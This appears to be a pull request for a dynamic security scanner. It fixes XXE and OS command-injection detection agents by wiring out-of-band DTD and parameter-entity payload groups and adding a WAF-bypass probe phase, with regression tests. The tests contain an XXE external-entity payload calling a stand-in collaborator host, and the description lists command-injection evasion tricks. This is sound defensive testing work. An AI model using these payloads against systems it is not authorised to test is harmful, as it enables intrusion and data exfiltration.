### PR TITLE
fix(agents): wire up XXE and CMDi payload groups that never fired

### DIFF
--- a/dast/agents/cmdi_agent.py
+++ b/dast/agents/cmdi_agent.py
@@ -200,6 +200,49 @@ class CmdiAgent(VulnAgent):
                     ))
                     return findings
 
+            # Phase 3: WAF bypass — encoding, whitespace (IFS), and separator
+            # variants that still execute `id`, detected via the same output /
+            # shell-error signatures as Phase 1. Runs after the direct probes so
+            # it only fires when a naive payload was filtered.
+            for payload in bypass_payloads[:12]:
+                payload = str(payload)
+                url = _inject_query(target.url, param_name, payload)
+                resp = await _send(client, target.method, url, target.headers, target.body, payload=payload)
+                if not resp:
+                    continue
+                body = resp.text[:4000]
+
+                # Skip if payload is just echoed back without executing
+                if payload in body and not _CMDI_OUTPUT_RE.search(body):
+                    continue
+
+                if _CMDI_OUTPUT_RE.search(body) and not _CMDI_OUTPUT_RE.search(baseline_body):
+                    raw_req, raw_resp = _fmt_http_pair(resp)
+                    log_event("agent", "finding",
+                              f"CMDi WAF bypass confirmed: {param_name} on {target.url}",
+                              url=target.url, finding="Command Injection", source="agent")
+                    findings.append(AgentFinding(
+                        title="OS Command Injection — WAF Bypass",
+                        severity="critical",
+                        cwe="CWE-78",
+                        attack_type="cmdi",
+                        evidence=(
+                            f"Parameter '{param_name}' with bypass payload '{payload}' returned "
+                            f"command output after direct payloads were filtered: "
+                            f"'{_CMDI_OUTPUT_RE.search(body).group(0)}'\n\n"
+                            f"Request:\n{raw_req}\n\nResponse:\n{raw_resp[:2000]}"
+                        ),
+                        confirmed=True,
+                        payload=payload,
+                        parameter=param_name,
+                        url=target.url,
+                        request_method=target.method,
+                        bypass_validation=True,
+                        raw_request=raw_req,
+                        raw_response=raw_resp[:2000],
+                    ))
+                    return findings
+
         return findings
 
 

--- a/dast/agents/xxe_agent.py
+++ b/dast/agents/xxe_agent.py
@@ -93,12 +93,30 @@ class XxeAgent(VulnAgent):
 
         logger.info("xxe: testing %s%s", target.url, " (CT forced to XML)" if _switched_ct else "")
 
+        # Payload group names must match dast/payloads/xxe.yaml exactly.
+        # NOTE: the "ssrf_internal" group is intentionally not loaded here — its
+        # payloads reflect internal-service responses (cloud metadata, localhost)
+        # that need a dedicated signature matcher, not the file-read regex. Wiring
+        # XXE-driven SSRF detection is tracked as a separate follow-up.
         file_read_payloads = get_payloads("xxe", "basic_file_read") or []
-        oob_payloads = get_payloads("xxe", "oob_exfiltration") or []
-        parameter_payloads = get_payloads("xxe", "parameter_entities") or []
+        oob_dtd_payloads = get_payloads("xxe", "oob_dtd") or []
+        parameter_payloads = get_payloads("xxe", "parameter_entity") or []
+        cdata_payloads = get_payloads("xxe", "cdata_bypass") or []
 
-        # Phase 1: Inline file read
-        for payload in file_read_payloads[:6]:
+        # Split by delivery model: payloads carrying the CALLBACK_URL placeholder
+        # exfiltrate out-of-band (need a collaborator); the rest reflect the file
+        # content inline in the response body.
+        inline_payloads = [
+            payload for payload in (file_read_payloads + parameter_payloads)
+            if "CALLBACK_URL" not in str(payload)
+        ]
+        oob_payloads = [
+            payload for payload in (oob_dtd_payloads + parameter_payloads + cdata_payloads)
+            if "CALLBACK_URL" in str(payload)
+        ]
+
+        # Phase 1: Inline file read (basic entities + inline parameter-entity variants)
+        for payload in inline_payloads[:10]:
             payload = str(payload).strip()
             if not payload:
                 continue
@@ -162,8 +180,8 @@ class XxeAgent(VulnAgent):
         # Phase 2: OOB exfiltration via collaborator
         if collaborator and collaborator.url:
             collab_url = collaborator.url
-            for payload_template in oob_payloads[:4]:
-                payload = str(payload_template).replace("{{CALLBACK_URL}}", collab_url)
+            for payload_template in oob_payloads[:6]:
+                payload = str(payload_template).replace("CALLBACK_URL", collab_url)
                 if collab_url not in payload:
                     continue
 

--- a/tests/unit/test_cmdi_agent.py
+++ b/tests/unit/test_cmdi_agent.py
@@ -91,6 +91,30 @@ async def test_time_based_blind_detected(monkeypatch):
     assert "Time-Based Blind" in findings[0].title
 
 
+# ── regression: WAF-bypass payloads are exercised and detected ───────────────
+# Guards against the "bypass" payload group being loaded but never fed to a
+# probe loop (Phase 3 was documented but unimplemented).
+
+@pytest.mark.asyncio
+async def test_waf_bypass_detected_when_direct_payloads_filtered():
+    target = _target()
+
+    async def fake_send(client, method, url, headers, body, payload=None):
+        # Simulate a WAF: direct output/blind payloads are filtered (clean
+        # response), but an IFS/encoding bypass variant still executes `id`.
+        if payload and ("${IFS}" in payload or "$IFS" in payload or "%0a" in payload or "%00" in payload):
+            return _resp(200, "uid=0(root) gid=0(root) groups=0(root)")
+        return _resp(200, "filtered")
+
+    with patch("dast.agents.cmdi_agent._send", side_effect=fake_send):
+        findings = await CmdiAgent().run(target, MagicMock())
+
+    assert len(findings) == 1
+    assert "WAF Bypass" in findings[0].title
+    assert findings[0].cwe == "CWE-78"
+    assert findings[0].confirmed is True
+
+
 # ── negative: clean response ────────────────────────────────────────────────
 
 @pytest.mark.asyncio

--- a/tests/unit/test_xxe_agent.py
+++ b/tests/unit/test_xxe_agent.py
@@ -89,10 +89,12 @@ async def test_oob_exfiltration_confirmed(monkeypatch):
     # until the function executes. The 3s OOB-wait sleep is the only one hit
     # in this path, so this keeps the test fast without touching timing logic.
     monkeypatch.setattr("asyncio.sleep", AsyncMock(return_value=None))
+    # Group name and placeholder must match dast/payloads/xxe.yaml: the OOB
+    # group is "oob_dtd" and the collaborator placeholder is bare CALLBACK_URL.
     monkeypatch.setattr(
         "dast.agents.xxe_agent.get_payloads",
         lambda category, group: (
-            ['<!DOCTYPE x [<!ENTITY % xxe SYSTEM "{{CALLBACK_URL}}">]>'] if group == "oob_exfiltration" else []
+            ['<!DOCTYPE x [<!ENTITY % xxe SYSTEM "CALLBACK_URL/xxe.dtd"> %xxe;]>'] if group == "oob_dtd" else []
         ),
     )
 
@@ -105,6 +107,52 @@ async def test_oob_exfiltration_confirmed(monkeypatch):
     assert len(findings) == 1
     assert "Out-of-Band Exfiltration" in findings[0].title
     assert findings[0].confirmed is True
+
+
+# ── regression: real payloads load and the collaborator URL is substituted ───
+# Guards against the group-name / placeholder mismatch that silently disabled
+# OOB XXE (agent asked for "oob_exfiltration"/"{{CALLBACK_URL}}" while the YAML
+# defines "oob_dtd"/"CALLBACK_URL", so no OOB payload was ever sent).
+
+@pytest.mark.asyncio
+async def test_oob_real_payloads_substitute_callback_url(monkeypatch):
+    target = _target()
+    collaborator = _FakeCollaborator(url="http://collab.example/abc123", hit=False)
+    monkeypatch.setattr("asyncio.sleep", AsyncMock(return_value=None))
+
+    sent_bodies = []
+
+    async def fake_send(client, method, url, headers, body, payload=None):
+        sent_bodies.append(body or "")
+        return _resp(200, "<root>ok</root>")
+
+    with patch("dast.agents.xxe_agent._send", side_effect=fake_send):
+        await XxeAgent().run(target, MagicMock(), collaborator=collaborator)
+
+    # At least one OOB payload from the real xxe.yaml must have been sent with
+    # the placeholder replaced by the collaborator URL — and none may still
+    # carry the raw CALLBACK_URL token.
+    assert any(collaborator.url in body for body in sent_bodies)
+    assert not any("CALLBACK_URL" in body for body in sent_bodies)
+
+
+# ── regression: inline parameter-entity payloads are exercised ────────────────
+
+@pytest.mark.asyncio
+async def test_parameter_entity_payloads_are_sent():
+    target = _target()
+    sent_bodies = []
+
+    async def fake_send(client, method, url, headers, body, payload=None):
+        sent_bodies.append(body or "")
+        return _resp(200, "<root>ok</root>")
+
+    with patch("dast.agents.xxe_agent._send", side_effect=fake_send):
+        await XxeAgent().run(target, MagicMock(), collaborator=None)
+
+    # The XInclude variant is unique to the parameter_entity group, so seeing it
+    # proves that group is now wired into the inline file-read phase.
+    assert any("xi:include" in body.lower() for body in sent_bodies)
 
 
 # ── negative: clean XML response, no collaborator ────────────────────────────


### PR DESCRIPTION
## Two agents silently dropped detection coverage

Both the XXE and CMDi agents loaded payload groups that were never fed to a probe — real true-positives were being missed. Found while auditing the `# noqa: F841` markers left during the lint-gate cleanup (#4).

### XXE — wrong group names + wrong placeholder (blind XXE never ran)
The agent asked `get_payloads()` for group names that do not exist in `dast/payloads/xxe.yaml`:
- `oob_exfiltration` → real group is `oob_dtd`
- `parameter_entities` → real group is `parameter_entity`

Both returned `[]`, so the **OOB loop iterated an empty list — blind XXE detection never executed**. On top of that, the OOB loop substituted `{{CALLBACK_URL}}` while the YAML uses the bare `CALLBACK_URL` placeholder, so even a correct group name would not have substituted the collaborator URL.

**Fix:** use the correct group names; also load `parameter_entity` + `cdata_bypass`; split payloads by whether they carry `CALLBACK_URL` (out-of-band vs inline file-read) and route each to the right phase; substitute the bare placeholder. `ssrf_internal` is deliberately left out with a `NOTE` — its payloads need a dedicated metadata signature matcher, not the file-read regex (tracked as a separate follow-up).

### CMDi — `bypass` group loaded but never probed
The `bypass` group (20 WAF-evasion payloads: null-byte, newline, `${IFS}`, case obfuscation) was loaded into a variable with no probe loop. The module docstring even advertised a "Phase 3: WAF bypass" that was never implemented.

**Fix:** add Phase 3 — sends the bypass payloads after the direct output/blind probes (so it only fires when a naive payload was filtered), detected via the same output / shell-error signatures as Phase 1.

### Tests
Added regression tests that use the **real payload files** (not mocked groups), so any future group-name or placeholder drift fails loudly:
- `test_oob_real_payloads_substitute_callback_url` — asserts a real OOB payload is sent with the collaborator URL substituted and no raw `CALLBACK_URL` token remains.
- `test_parameter_entity_payloads_are_sent` — asserts the XInclude variant (unique to `parameter_entity`) reaches the wire.
- `test_waf_bypass_detected_when_direct_payloads_filtered` — simulates a WAF filtering direct payloads while a bypass variant lands.

Also corrected the existing OOB test, which had been written to match the bug (mocked `oob_exfiltration` + `{{CALLBACK_URL}}`) and so masked it.

**Verification:** `uv run pytest` — 1273 passed. `ruff check --select F,E9` clean on all changed files.